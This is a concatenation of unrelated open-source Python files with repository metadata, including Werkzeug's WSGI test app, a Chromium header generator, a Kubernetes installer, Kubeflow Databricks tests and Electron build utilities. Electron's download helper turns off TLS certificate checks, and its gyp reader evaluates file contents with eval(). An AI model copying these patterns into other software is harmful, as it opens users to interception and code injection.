ba78iCvUkt+V6BpwMlErmcgc502x+u1nSxJSJP9Mi52awD1V4yB/QHONsnU3L+A/zR4VL/indx/y64
gqcj+qgTeweM86f0Qy1QVbvmWH1D9h+alqg254QD8HJXHvjQaGOqEqC22M54PcftZVKVSQG9jhkv7C
JyTyDoAJfPdu8v7DRZAxsP/ky9MJ3OL36DJfCFPASC3/aXlfLOOON9vGZZHydGf8LnxYJuuVIbl83y
Az5n/RPz07E+9+zw2A2ahz4HxHo9Kt79HTMx1Q7ma7zAzHgHqYH0SoZWyTuOLMiHwSfZDAQTn0ajk9
YQqodnUYjByQZhZak9Wu4gYQsMyEpIOAOQKze8CmEF45KuAHTvIDOfHJNipwoHMuGHBnJElUoDmAyX
c2Qm/R8Ah/iILCCJOEokGowdhDYc/yoL+vpRGwyVSCWFYZNljkhEirGXsalWcAgOdeAdoXcktF2udb
qbUhjWyMQxYO01o6KYKOr6iK3fE4MaS+DsvBsGOBaMb0Y6IxADaJhFICaOLmiWTlDAnY1KzDG4ambL
cWBA8mUzjJsN2KjSaSXGqMCVXYpYkj33mcIApyhQf6YqgeNAmNvuC0t4CsDbSshZJkCS1eNisKqlyG
cF8G2JeiDX6tO6Mv0SmjCa3MFb0bJaGPMU0X7c8XcpvMaOQmCajwSeY9G0WqbBmKv34DsMIEztU6Y2
KiDlFdt6jnCSqx7Dmt6XnqSKaFFHNO5+FmODxMCWBEaco77lNDGXBM0ECYB/+s7nKFdwSF5hgXumQe
EZ7amRg39RHy3zIjyRCykQh8Zo2iviRKyTDn/zx6EefptJj2Cw+Ep2FSc01U5ry4KLPYsTyWnVGnvb
UpyGlhjBUljyjHhWpf8OFaXwhp9O4T1gU9UeyPPa8A2l0p1kNqPXEVRm1AOs1oAGZU596t6SOR2mcB
Oco1srWtkaVrMUzIErrKri85keKqRQYX9VX0/eAUK1hrSu6HMEX3Qh2sCh0q0D2CtnUqS4hj62sE/z
aDs2Sg7MBS6xnQeooc2R2tC9YrKpEi9pLXfYXp20tDCpSP8rKlrD4axprb9u1Df5hSbz9QU0cRpfgn
kiIzwKucd0wsEHlLpe5yHXuc6FrNelOl7pY2+11kTWx7VpRu97dXA3DO1vbkhcb4zyvERYajQgAADs
='''), mimetype='image/png')
TEMPLATE = u'''\
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<title>WSGI Information</title>
<style type="text/css">
@import url(http://fonts.googleapis.com/css?family=Ubuntu);
body { font-family: 'Lucida Grande', 'Lucida Sans Unicode', 'Geneva',
'Verdana', sans-serif; background-color: white; color: #000;
font-size: 15px; text-align: center; }
#logo { float: right; padding: 0 0 10px 10px; }
div.box { text-align: left; width: 45em; margin: auto; padding: 50px 0;
background-color: white; }
h1, h2 { font-family: 'Ubuntu', 'Lucida Grande', 'Lucida Sans Unicode',
'Geneva', 'Verdana', sans-serif; font-weight: normal; }
h1 { margin: 0 0 30px 0; }
h2 { font-size: 1.4em; margin: 1em 0 0.5em 0; }
table { width: 100%%; border-collapse: collapse; border: 1px solid #AFC5C9 }
table th { background-color: #AFC1C4; color: white; font-size: 0.72em;
font-weight: normal; width: 18em; vertical-align: top;
padding: 0.5em 0 0.1em 0.5em; }
table td { border: 1px solid #AFC5C9; padding: 0.1em 0 0.1em 0.5em; }
code { font-family: 'Consolas', 'Monaco', 'Bitstream Vera Sans Mono',
monospace; font-size: 0.7em; }
ul li { line-height: 1.5em; }
ul.path { font-size: 0.7em; margin: 0 -30px; padding: 8px 30px;
list-style: none; background: #E8EFF0; }
ul.path li { line-height: 1.6em; }
li.virtual { color: #999; text-decoration: underline; }
li.exp { background: white; }
</style>
<div class="box">
<img src="?resource=logo" id="logo" alt="[The Werkzeug Logo]" />
<h1>WSGI Information</h1>
<p>
This page displays all available information about the WSGI server and
the underlying Python interpreter.
<h2 id="python-interpreter">Python Interpreter</h2>
<table>
<tr>
<th>Python Version
<td>%(python_version)s
<tr>
<th>Platform
<td>%(platform)s [%(os)s]
<tr>
<th>API Version
<td>%(api_version)s
<tr>
<th>Byteorder
<td>%(byteorder)s
<tr>
<th>Werkzeug Version
<td>%(werkzeug_version)s
</table>
<h2 id="wsgi-environment">WSGI Environment</h2>
<table>%(wsgi_env)s</table>
<h2 id="installed-eggs">Installed Eggs</h2>
<p>
The following python packages were installed on the system as
Python eggs:
<ul>%(python_eggs)s</ul>
<h2 id="sys-path">System Path</h2>
<p>
The following paths are the current contents of the load path. The
following entries are looked up for Python packages. Note that not
all items in this path are folders. Gray and underlined items are
entries pointing to invalid resources or used by custom import hooks
such as the zip importer.
<p>
Items with a bright background were expanded for display from a relative
path. If you encounter such paths in the output you might want to check
your setup as relative paths are usually problematic in multithreaded
environments.
<ul class="path">%(sys_path)s</ul>
</div>
'''
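# iter_sys_path() below yields (display_path, is_virtual, was_expanded) for
# each sys.path entry: a home-relative display form on POSIX, "virtual" when
# the entry is not a directory, "expanded" when the raw entry was relative.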
def iter_sys_path():
if os.name == 'posix':
def strip(x):
prefix = os.path.expanduser('~')
if x.startswith(prefix):
x = '~' + x[len(prefix):]
return x
else:
strip = lambda x: x
cwd = os.path.abspath(os.getcwd())
for item in sys.path:
path = os.path.join(cwd, item or os.path.curdir)
yield strip(os.path.normpath(path)), \
not os.path.isdir(path), path != item
def render_testapp(req):
try:
import pkg_resources
except ImportError:
eggs = ()
else:
eggs = sorted(pkg_resources.working_set,
key=lambda x: x.project_name.lower())
python_eggs = []
for egg in eggs:
try:
version = egg.version
except (ValueError, AttributeError):
version = 'unknown'
python_eggs.append('<li>%s <small>[%s]</small>' % (
escape(egg.project_name),
escape(version)
))
wsgi_env = []
sorted_environ = sorted(req.environ.items(),
key=lambda x: repr(x[0]).lower())
for key, value in sorted_environ:
wsgi_env.append('<tr><th>%s<td><code>%s</code>' % (
escape(str(key)),
' '.join(wrap(escape(repr(value))))
))
sys_path = []
for item, virtual, expanded in iter_sys_path():
class_ = []
if virtual:
class_.append('virtual')
if expanded:
class_.append('exp')
sys_path.append('<li%s>%s' % (
class_ and ' class="%s"' % ' '.join(class_) or '',
escape(item)
))
return (TEMPLATE % {
'python_version': '<br>'.join(escape(sys.version).splitlines()),
'platform': escape(sys.platform),
'os': escape(os.name),
'api_version': sys.api_version,
'byteorder': sys.byteorder,
'werkzeug_version': werkzeug.__version__,
'python_eggs': '\n'.join(python_eggs),
'wsgi_env': '\n'.join(wsgi_env),
'sys_path': '\n'.join(sys_path)
}).encode('utf-8')
def test_app(environ, start_response):
"""Simple test application that dumps the environment. You can use
it to check if Werkzeug is working properly:
.. sourcecode:: pycon
>>> from werkzeug.serving import run_simple
>>> from werkzeug.testapp import test_app
>>> run_simple('localhost', 3000, test_app)
* Running on http://localhost:3000/
The application displays important information from the WSGI environment,
the Python interpreter and the installed libraries.
"""
req = Request(environ, populate_request=False)
if req.args.get('resource') == 'logo':
response = logo
else:
response = Response(render_testapp(req), mimetype='text/html')
return response(environ, start_response)
if __name__ == '__main__':
from werkzeug.serving import run_simple
run_simple('localhost', 5000, test_app, use_reloader=True)
|
linjoahow/w17g
|
refs/heads/master
|
static/Brython3.1.1-20150328-091302/Lib/xml/etree/cElementTree.py
|
876
|
# Deprecated alias for xml.etree.ElementTree
from xml.etree.ElementTree import *
|
Plain-Andy-legacy/android_external_chromium_org
|
refs/heads/lp-5.1r1
|
tools/generate_shim_headers/generate_shim_headers.py
|
150
|
#!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Generates shim headers that mirror the directory structure of bundled headers,
but just forward to the system ones.
This allows seamless compilation against system headers with no changes
to our source code.
"""
import optparse
import os.path
import sys
SHIM_TEMPLATE = """
#if defined(OFFICIAL_BUILD)
#error shim headers must not be used in official builds!
#endif
"""
def GeneratorMain(argv):
parser = optparse.OptionParser()
parser.add_option('--headers-root', action='append')
parser.add_option('--define', action='append')
parser.add_option('--output-directory')
parser.add_option('--prefix', default='')
parser.add_option('--use-include-next', action='store_true')
parser.add_option('--outputs', action='store_true')
parser.add_option('--generate', action='store_true')
options, args = parser.parse_args(argv)
if not options.headers_root:
parser.error('Missing --headers-root parameter.')
if not options.output_directory:
parser.error('Missing --output-directory parameter.')
if not args:
parser.error('Missing arguments - header file names.')
source_tree_root = os.path.abspath(
os.path.join(os.path.dirname(__file__), '..', '..'))
for root in options.headers_root:
target_directory = os.path.join(
options.output_directory,
os.path.relpath(root, source_tree_root))
if options.generate and not os.path.exists(target_directory):
os.makedirs(target_directory)
for header_spec in args:
if ';' in header_spec:
(header_filename,
include_before,
include_after) = header_spec.split(';', 2)
else:
header_filename = header_spec
include_before = ''
include_after = ''
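      # A header_spec may carry extra includes, e.g.
      # "jpeglib.h;<stdio.h>:<stddef.h>;" (illustrative): the colon-separated
      # entries are emitted verbatim before/after the shimmed #include.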
if options.outputs:
yield os.path.join(target_directory, header_filename)
if options.generate:
with open(os.path.join(target_directory, header_filename), 'w') as f:
f.write(SHIM_TEMPLATE)
if options.define:
for define in options.define:
key, value = define.split('=', 1)
# This non-standard push_macro extension is supported
# by compilers we support (GCC, clang).
f.write('#pragma push_macro("%s")\n' % key)
f.write('#undef %s\n' % key)
f.write('#define %s %s\n' % (key, value))
if include_before:
for header in include_before.split(':'):
f.write('#include %s\n' % header)
include_target = options.prefix + header_filename
if options.use_include_next:
f.write('#include_next <%s>\n' % include_target)
else:
f.write('#include <%s>\n' % include_target)
if include_after:
for header in include_after.split(':'):
f.write('#include %s\n' % header)
if options.define:
for define in options.define:
key, value = define.split('=', 1)
# This non-standard pop_macro extension is supported
# by compilers we support (GCC, clang).
f.write('#pragma pop_macro("%s")\n' % key)
def DoMain(argv):
return '\n'.join(GeneratorMain(argv))
if __name__ == '__main__':
DoMain(sys.argv[1:])
|
wb14123/kubernetes
|
refs/heads/master
|
cluster/juju/charms/trusty/kubernetes-master/hooks/kubernetes_installer.py
|
213
|
#!/usr/bin/env python
# Copyright 2015 The Kubernetes Authors All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import shlex
import subprocess
from path import path
def run(command, shell=False):
""" A convience method for executing all the commands. """
print(command)
if shell is False:
command = shlex.split(command)
output = subprocess.check_output(command, shell=shell)
print(output)
return output
class KubernetesInstaller():
"""
    This class contains the logic needed to install kubernetes binary files.
"""
def __init__(self, arch, version, output_dir):
""" Gather the required variables for the install. """
# The kubernetes-master charm needs certain commands to be aliased.
self.aliases = {'kube-apiserver': 'apiserver',
'kube-controller-manager': 'controller-manager',
'kube-proxy': 'kube-proxy',
'kube-scheduler': 'scheduler',
'kubectl': 'kubectl',
'kubelet': 'kubelet'}
self.arch = arch
self.version = version
self.output_dir = path(output_dir)
def build(self, branch):
""" Build kubernetes from a github repository using the Makefile. """
# Remove any old build artifacts.
make_clean = 'make clean'
run(make_clean)
# Always checkout the master to get the latest repository information.
git_checkout_cmd = 'git checkout master'
run(git_checkout_cmd)
# When checking out a tag, delete the old branch (not master).
if branch != 'master':
git_drop_branch = 'git branch -D {0}'.format(self.version)
print(git_drop_branch)
rc = subprocess.call(git_drop_branch.split())
if rc != 0:
print('returned: %d' % rc)
# Make sure the git repository is up-to-date.
git_fetch = 'git fetch origin {0}'.format(branch)
run(git_fetch)
if branch == 'master':
git_reset = 'git reset --hard origin/master'
run(git_reset)
else:
# Checkout a branch of kubernetes so the repo is correct.
checkout = 'git checkout -b {0} {1}'.format(self.version, branch)
run(checkout)
# Create an environment with the path to the GO binaries included.
go_path = ('/usr/local/go/bin', os.environ.get('PATH', ''))
go_env = os.environ.copy()
go_env['PATH'] = ':'.join(go_path)
print(go_env['PATH'])
# Compile the binaries with the make command using the WHAT variable.
make_what = "make all WHAT='cmd/kube-apiserver cmd/kubectl "\
"cmd/kube-controller-manager plugin/cmd/kube-scheduler "\
"cmd/kubelet cmd/kube-proxy'"
print(make_what)
rc = subprocess.call(shlex.split(make_what), env=go_env)
def install(self, install_dir=path('/usr/local/bin')):
""" Install kubernetes binary files from the output directory. """
if not install_dir.isdir():
install_dir.makedirs_p()
# Create the symbolic links to the real kubernetes binaries.
for key, value in self.aliases.iteritems():
target = self.output_dir / key
if target.exists():
link = install_dir / value
if link.exists():
link.remove()
target.symlink(link)
else:
print('Error target file {0} does not exist.'.format(target))
exit(1)
|
KodingKlub/gHashCode
|
refs/heads/master
|
wojtek.py
|
1
|
import numpy as np
import philipp as p
import kordian as k
import anna as a
import parser
import sys
import itertools
def print_combination(combination):
    used_caches = sorted([k for k, v in combination.items() if v[0] != 0])
print(len(used_caches))
for used_cache in used_caches:
videos_str = " ".join([str(c) for c in combination[used_cache][1]])
print(used_cache, videos_str)
def make_sets(items, cache_ids, num_of_boxes=3):
allpossible = []
for tup in itertools.product(range(len(cache_ids)), repeat=len(items)):
boxes = [list() for _ in range(len(cache_ids))]
for item, box in zip(items, tup):
# print (cache_ids[box])
# itee = (, item)
boxes[box].append({cache_ids[box]: (0, item)})
# print(boxes)
boxes_ = []
boxes__ = []
for b in boxes:
ob = {}
for e in b:
for k in e:
if k not in ob:
ob[k] = (0,[])
ob[k][1].append(e[k][1])
boxes_.append(ob)
for k,v in ob.items():
boxes__.append((k,ob[k][1]))
# print(boxes__)
# print(boxes_)
allpossible.append(boxes__)
return allpossible
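# For example (illustrative), make_sets(('A', 'B'), [0, 1]) yields, among
# other assignments, [(0, ['A', 'B'])] and [(0, ['A']), (1, ['B'])].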
if __name__ == '__main__':
fname = sys.argv[1] if len(sys.argv) == 2 else "data/small.in"
problem = parser.get_problem(fname)
# combination = {0:(80,[0,2]),1:(30,[1]),2:(0,[]),5:(10,[100])}
# for k,v in combination.items():
# print(k,v)
# print()
# print()
# print_combination(combination)
make_sets(('A', 'B', 'C'), [0,1,8])
# for p in make_sets(('A', 'B', 'C'), [0,1,8]):
# for box in p:
# print(str(box).ljust(20),)
# print()
|
qPCR4vir/orange3
|
refs/heads/master
|
Orange/tests/test_clustering_hierarchical.py
|
1
|
# Test methods with long descriptive names can omit docstrings
# pylint: disable=missing-docstring
import unittest
from itertools import chain, tee
import numpy
from Orange.clustering import hierarchical
import Orange.misc
def flatten(seq):
return chain(*seq)
class TestHierarchical(unittest.TestCase):
@classmethod
def setUpClass(cls):
m = [[],
[3],
[2, 4],
[17, 5, 4],
[2, 8, 3, 8],
[7, 5, 10, 11, 2],
[8, 4, 1, 5, 11, 13],
[4, 7, 12, 8, 10, 1, 5],
[13, 9, 14, 15, 7, 8, 4, 6],
[12, 10, 11, 15, 2, 5, 7, 3, 1]]
cls.items = ["Ann", "Bob", "Curt", "Danny", "Eve", "Fred",
"Greg", "Hue", "Ivy", "Jon"]
dist = numpy.array(list(flatten(m)), dtype=float)
matrix = hierarchical.squareform(dist, mode="lower")
cls.m = m
cls.matrix = Orange.misc.DistMatrix(matrix)
cls.matrix.items = cls.items
cls.cluster = hierarchical.dist_matrix_clustering(cls.matrix)
def test_mapping(self):
leaves = list(hierarchical.leaves(self.cluster))
indices = [n.value.index for n in leaves]
self.assertEqual(len(indices), len(self.matrix.items))
self.assertEqual(set(indices), set(range(len(self.matrix.items))))
#self.assertEqual(indices,
# [3, 1, 2, 6, 0, 4, 8, 9, 5, 7])
def test_order(self):
post = list(hierarchical.postorder(self.cluster))
seen = set()
for n in post:
self.assertTrue(all(ch in seen for ch in n.branches))
seen.add(n)
pre = list(hierarchical.preorder(self.cluster))
seen = set()
for n in pre:
self.assertTrue(all(ch not in seen for ch in n.branches))
seen.add(n)
    def test_pruning(self):
pruned = hierarchical.prune(self.cluster, level=2)
depths = hierarchical.cluster_depths(pruned)
self.assertTrue(all(d <= 2 for d in depths.values()))
pruned = hierarchical.prune(self.cluster, height=10)
        # Check internal clusters only; pruning collapses lower subtrees
        # into leaves.
        self.assertTrue(all(c.height >= 10
                            for c in hierarchical.preorder(pruned)
                            if c.branches))
def test_form(self):
m = [[0, 2, 3, 4],
[2, 0, 6, 7],
[3, 6, 0, 8],
[4, 7, 8, 0]]
m = numpy.array(m)
dist = hierarchical.condensedform(m, mode="lower")
numpy.testing.assert_equal(dist, numpy.array([2, 3, 6, 4, 7, 8]))
numpy.testing.assert_equal(
hierarchical.squareform(dist, mode="lower"), m)
dist = hierarchical.condensedform(m, mode="upper")
numpy.testing.assert_equal(dist, numpy.array([2, 3, 4, 6, 7, 8]))
numpy.testing.assert_equal(
hierarchical.squareform(dist, mode="upper"), m)
def test_pre_post_order(self):
tree = hierarchical.Tree
root = tree("A", (tree("B"), tree("C")))
self.assertEqual([n.value for n in hierarchical.postorder(root)],
["B", "C", "A"])
self.assertEqual([n.value for n in hierarchical.preorder(root)],
["A", "B", "C"])
def test_optimal_ordering(self):
def indices(root):
return [leaf.value.index for leaf in hierarchical.leaves(root)]
ordered = hierarchical.optimal_leaf_ordering(
self.cluster, self.matrix)
self.assertEqual(ordered.value.range, self.cluster.value.range)
self.assertSetEqual(set(indices(self.cluster)),
set(indices(ordered)))
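        # pairs() below yields each pair of neighbouring elements of a
        # sequence (an offset-by-one zip); it is used to sum the distances
        # between adjacent leaves when scoring a leaf ordering.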
def pairs(iterable):
i1, i2 = tee(iterable)
next(i1)
yield from zip(i1, i2)
def score(root):
return sum([self.matrix[i, j] for i, j in pairs(indices(root))])
score_unordered = score(self.cluster)
score_ordered = score(ordered)
self.assertGreater(score_unordered, score_ordered)
self.assertEqual(score_ordered, 21.0)
class TestTree(unittest.TestCase):
def test_tree(self):
Tree = hierarchical.Tree
left = Tree(0, ())
self.assertTrue(left.is_leaf)
right = Tree(1, ())
self.assertEqual(left, Tree(0, ()))
self.assertNotEqual(left, right)
self.assertLess(left, right)
root = Tree(2, (left, right))
self.assertFalse(root.is_leaf)
self.assertIs(root.left, left)
self.assertIs(root.right, right)
val, br = root
self.assertEqual(val, 2)
self.assertEqual(br, (left, right))
self.assertEqual(repr(left), "Tree(value=0, branches=())")
|
credp/lisa
|
refs/heads/master
|
external/workload-automation/wa/workloads/templerun2/__init__.py
|
5
|
# Copyright 2013-2018 ARM Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from wa import ApkReventWorkload
class TempleRun2(ApkReventWorkload):
name = 'templerun2'
package_names = ['com.imangi.templerun2']
description = """
Temple Run 2 game.
Sequel to Temple Run. 3D on-the-rails racer.
"""
view = 'SurfaceView - com.imangi.templerun2/com.imangi.unityactivity.ImangiUnityNativeActivity'
|
GoogleCloudPlatform/training-data-analyst
|
refs/heads/master
|
courses/machine_learning/deepdive2/production_ml/labs/samples/contrib/azure-samples/kfp-azure-databricks/tests/test_workspaceitem_op.py
|
3
|
import unittest
from pathlib import Path
import kfp
from kfp.dsl import PipelineParam
from databricks import ImportWorkspaceItemOp, DeleteWorkspaceItemOp
class TestImportWorkspaceItemOp(unittest.TestCase):
def test_databricks_import_workspaceitem_without_k8s_or_item_name(self):
def my_pipeline():
ImportWorkspaceItemOp(
name="importworkspaceitem",
content="cHJpbnQoImhlbGxvLCB3b3JsZCIpCgoK",
path="/Users/user@foo.com/ScalaExampleNotebook",
language="SCALA",
file_format="SOURCE"
)
self.assertRaises(ValueError, lambda: kfp.compiler.Compiler()._create_workflow(my_pipeline))
def test_databricks_import_workspaceitem(self):
def my_pipeline():
item_name = "test-item"
content = "cHJpbnQoImhlbGxvLCB3b3JsZCIpCgoK"
path = "/Users/user@foo.com/ScalaExampleNotebook"
language = "SCALA"
file_format = "SOURCE"
expected_spec = {
"content": content,
"path": path,
"language": language,
"format": file_format
}
res = ImportWorkspaceItemOp(
name="importworkspaceitem",
item_name=item_name,
content=content,
path=path,
language=language,
file_format=file_format
)
self.assert_res(res, expected_spec)
kfp.compiler.Compiler()._create_workflow(my_pipeline)
def test_databricks_import_workspaceitem_with_spec(self):
def my_pipeline():
item_name = "test-item"
spec = {
"content": "cHJpbnQoImhlbGxvLCB3b3JsZCIpCgoK",
"path": "/Users/user@foo.com/ScalaExampleNotebook",
"language": "SCALA",
"format": "SOURCE"
}
res = ImportWorkspaceItemOp(
name="importworkspaceitem",
item_name=item_name,
spec=spec
)
self.assert_res(res, spec)
kfp.compiler.Compiler()._create_workflow(my_pipeline)
def test_databricks_import_workspaceitem_with_spec_and_extra_args(self):
def my_pipeline():
item_name = "test-item"
content = "cHJpbnQoImhlbGxvLCB3b3JsZCIpCgoK"
spec = {
"path": "/Users/user@foo.com/ScalaExampleNotebook",
"language": "SCALA",
"format": "SOURCE"
}
expected_spec = {
"content": "cHJpbnQoImhlbGxvLCB3b3JsZCIpCgoK",
"path": "/Users/user@foo.com/ScalaExampleNotebook",
"language": "SCALA",
"format": "SOURCE"
}
res = ImportWorkspaceItemOp(
name="importworkspaceitem",
item_name=item_name,
spec=spec,
content=content
)
self.assert_res(res, expected_spec)
kfp.compiler.Compiler()._create_workflow(my_pipeline)
def test_databricks_import_workspaceitem_with_json_spec(self):
def my_pipeline():
item_name = "test-item"
json_spec = """
{
"content": "cHJpbnQoImhlbGxvLCB3b3JsZCIpCgoK",
"path": "/Users/user@foo.com/ScalaExampleNotebook",
"language": "SCALA",
"format": "SOURCE"
}
"""
expected_spec = {
"content": "cHJpbnQoImhlbGxvLCB3b3JsZCIpCgoK",
"path": "/Users/user@foo.com/ScalaExampleNotebook",
"language": "SCALA",
"format": "SOURCE"
}
res = ImportWorkspaceItemOp.from_json_spec(
name="importworkspaceitem",
item_name=item_name,
json_spec=json_spec
)
self.assert_res(res, expected_spec)
kfp.compiler.Compiler()._create_workflow(my_pipeline)
def test_databricks_import_workspaceitem_with_json_file_spec(self):
def my_pipeline():
item_name = "test-item"
current_path = Path(__file__).parent
json_spec_file_name = current_path.joinpath("workspaceitem_spec.json")
expected_spec = {
"content": "cHJpbnQoImhlbGxvLCB3b3JsZCIpCgoK",
"path": "/Users/user@foo.com/ScalaExampleNotebook",
"language": "SCALA",
"format": "SOURCE"
}
res = ImportWorkspaceItemOp.from_file_name(
name="importworkspaceitem",
item_name=item_name,
file_name=json_spec_file_name
)
self.assert_res(res, expected_spec)
kfp.compiler.Compiler()._create_workflow(my_pipeline)
def assert_res(self, res, expected_spec):
self.assertEqual(res.name, "importworkspaceitem")
self.assertEqual(res.resource.action, "create")
self.assertEqual(res.resource.success_condition, "status.object_hash")
self.assertEqual(res.resource.failure_condition, None)
self.assertEqual(res.resource.manifest, None)
expected_attribute_outputs = {
"name": "{.metadata.name}",
"object_hash": "{.status.object_hash}",
"object_language": "{.status.object_info.language}",
"object_type": "{.status.object_info.object_type}",
"object_path": "{.status.object_info.path}",
"manifest": "{}"
}
self.assertEqual(res.attribute_outputs, expected_attribute_outputs)
expected_outputs = {
"name": PipelineParam(name="name", op_name=res.name),
"object_hash": PipelineParam(name="object_hash", op_name=res.name),
"object_language": PipelineParam(name="object_language", op_name=res.name),
"object_type": PipelineParam(name="object_type", op_name=res.name),
"object_path": PipelineParam(name="object_path", op_name=res.name),
"manifest": PipelineParam(name="manifest", op_name=res.name)
}
self.assertEqual(res.outputs, expected_outputs)
self.assertEqual(
res.output,
PipelineParam(name="name", op_name=res.name)
)
self.assertEqual(res.dependent_names, [])
self.assertEqual(res.k8s_resource["kind"], "WorkspaceItem")
self.assertEqual(res.k8s_resource["metadata"]["name"], "test-item")
self.assertEqual(res.k8s_resource["spec"], expected_spec)
class TestDeleteWorkspaceItemOp(unittest.TestCase):
def test_databricks_delete_workspaceitem_without_k8s_or_item_name(self):
def my_pipeline():
DeleteWorkspaceItemOp(
name="deleteworkspaceitem"
)
self.assertRaises(ValueError, lambda: kfp.compiler.Compiler()._create_workflow(my_pipeline))
def test_databricks_delete_workspaceitem(self):
def my_pipeline():
res = DeleteWorkspaceItemOp(
name="deleteworkspaceitem",
item_name="test-item"
)
self.assertEqual(res.name, "deleteworkspaceitem")
self.assertEqual(res.resource.action, "delete")
self.assertEqual(res.resource.success_condition, None)
self.assertEqual(res.resource.failure_condition, None)
self.assertEqual(res.resource.manifest, None)
self.assertEqual(res.attribute_outputs, {})
self.assertEqual(res.outputs, {})
self.assertEqual(res.output, None)
self.assertEqual(res.dependent_names, [])
self.assertEqual(res.k8s_resource["kind"], "WorkspaceItem")
self.assertEqual(res.k8s_resource["metadata"]["name"], "test-item")
kfp.compiler.Compiler()._create_workflow(my_pipeline)
if __name__ == '__main__':
unittest.main()
|
xfstudio/electron
|
refs/heads/master
|
script/lib/util.py
|
149
|
#!/usr/bin/env python
import atexit
import contextlib
import errno
import platform
import re
import shutil
import ssl
import subprocess
import sys
import tarfile
import tempfile
import urllib2
import os
import zipfile
from config import is_verbose_mode
def get_host_arch():
"""Returns the host architecture with a predictable string."""
host_arch = platform.machine()
# Convert machine type to format recognized by gyp.
if re.match(r'i.86', host_arch) or host_arch == 'i86pc':
host_arch = 'ia32'
elif host_arch in ['x86_64', 'amd64']:
host_arch = 'x64'
elif host_arch.startswith('arm'):
host_arch = 'arm'
# platform.machine is based on running kernel. It's possible to use 64-bit
# kernel with 32-bit userland, e.g. to give linker slightly more memory.
# Distinguish between different userland bitness by querying
# the python binary.
if host_arch == 'x64' and platform.architecture()[0] == '32bit':
host_arch = 'ia32'
return host_arch
def tempdir(prefix=''):
directory = tempfile.mkdtemp(prefix=prefix)
atexit.register(shutil.rmtree, directory)
return directory
@contextlib.contextmanager
def scoped_cwd(path):
cwd = os.getcwd()
os.chdir(path)
try:
yield
finally:
os.chdir(cwd)
@contextlib.contextmanager
def scoped_env(key, value):
origin = ''
if key in os.environ:
origin = os.environ[key]
os.environ[key] = value
try:
yield
finally:
os.environ[key] = origin
def download(text, url, path):
safe_mkdir(os.path.dirname(path))
with open(path, 'wb') as local_file:
if hasattr(ssl, '_create_unverified_context'):
ssl._create_default_https_context = ssl._create_unverified_context
web_file = urllib2.urlopen(url)
file_size = int(web_file.info().getheaders("Content-Length")[0])
downloaded_size = 0
block_size = 128
ci = os.environ.get('CI') == '1'
while True:
buf = web_file.read(block_size)
if not buf:
break
downloaded_size += len(buf)
local_file.write(buf)
if not ci:
percent = downloaded_size * 100. / file_size
status = "\r%s %10d [%3.1f%%]" % (text, downloaded_size, percent)
print status,
if ci:
print "%s done." % (text)
else:
print
return path
def extract_tarball(tarball_path, member, destination):
with tarfile.open(tarball_path) as tarball:
tarball.extract(member, destination)
def extract_zip(zip_path, destination):
if sys.platform == 'darwin':
    # Use the unzip command on Mac so that symbolic links in the zip
    # file keep working.
execute(['unzip', zip_path, '-d', destination])
else:
with zipfile.ZipFile(zip_path) as z:
z.extractall(destination)
def make_zip(zip_file_path, files, dirs):
safe_unlink(zip_file_path)
if sys.platform == 'darwin':
files += dirs
execute(['zip', '-r', '-y', zip_file_path] + files)
else:
zip_file = zipfile.ZipFile(zip_file_path, "w", zipfile.ZIP_DEFLATED)
for filename in files:
zip_file.write(filename, filename)
for dirname in dirs:
for root, _, filenames in os.walk(dirname):
for f in filenames:
zip_file.write(os.path.join(root, f))
zip_file.close()
def rm_rf(path):
try:
shutil.rmtree(path)
except OSError:
pass
def safe_unlink(path):
try:
os.unlink(path)
except OSError as e:
if e.errno != errno.ENOENT:
raise
def safe_mkdir(path):
try:
os.makedirs(path)
except OSError as e:
if e.errno != errno.EEXIST:
raise
def execute(argv, env=os.environ):
if is_verbose_mode():
print ' '.join(argv)
try:
output = subprocess.check_output(argv, stderr=subprocess.STDOUT, env=env)
if is_verbose_mode():
print output
return output
except subprocess.CalledProcessError as e:
print e.output
raise e
def execute_stdout(argv, env=os.environ):
if is_verbose_mode():
print ' '.join(argv)
try:
subprocess.check_call(argv, env=env)
except subprocess.CalledProcessError as e:
print e.output
raise e
else:
execute(argv, env)
def atom_gyp():
SOURCE_ROOT = os.path.abspath(os.path.join(__file__, '..', '..', '..'))
gyp = os.path.join(SOURCE_ROOT, 'atom.gyp')
with open(gyp) as f:
    obj = eval(f.read())
return obj['variables']
def get_atom_shell_version():
return 'v' + atom_gyp()['version%']
def parse_version(version):
if version[0] == 'v':
version = version[1:]
vs = version.split('.')
if len(vs) > 4:
return vs[0:4]
else:
return vs + ['0'] * (4 - len(vs))
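# For example (illustrative), parse_version('v1.2.3') returns
# ['1', '2', '3', '0'], padding the result to four components.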
def s3put(bucket, access_key, secret_key, prefix, key_prefix, files):
env = os.environ.copy()
BOTO_DIR = os.path.abspath(os.path.join(__file__, '..', '..', '..', 'vendor',
'boto'))
env['PYTHONPATH'] = os.path.pathsep.join([
env.get('PYTHONPATH', ''),
os.path.join(BOTO_DIR, 'build', 'lib'),
os.path.join(BOTO_DIR, 'build', 'lib.linux-x86_64-2.7')])
boto = os.path.join(BOTO_DIR, 'bin', 's3put')
args = [
sys.executable,
boto,
'--bucket', bucket,
'--access_key', access_key,
'--secret_key', secret_key,
'--prefix', prefix,
'--key_prefix', key_prefix,
'--grant', 'public-read'
] + files
execute(args, env)
|
cfournie/segmentation.evaluation
|
refs/heads/master
|
segeval/util/lang.py
|
2
|
'''
Python-language utils.
.. moduleauthor:: Chris Fournier <chris.m.fournier@gmail.com>
'''
def enum(*sequential, **named):
'''
http://stackoverflow.com/a/1695250/2134
'''
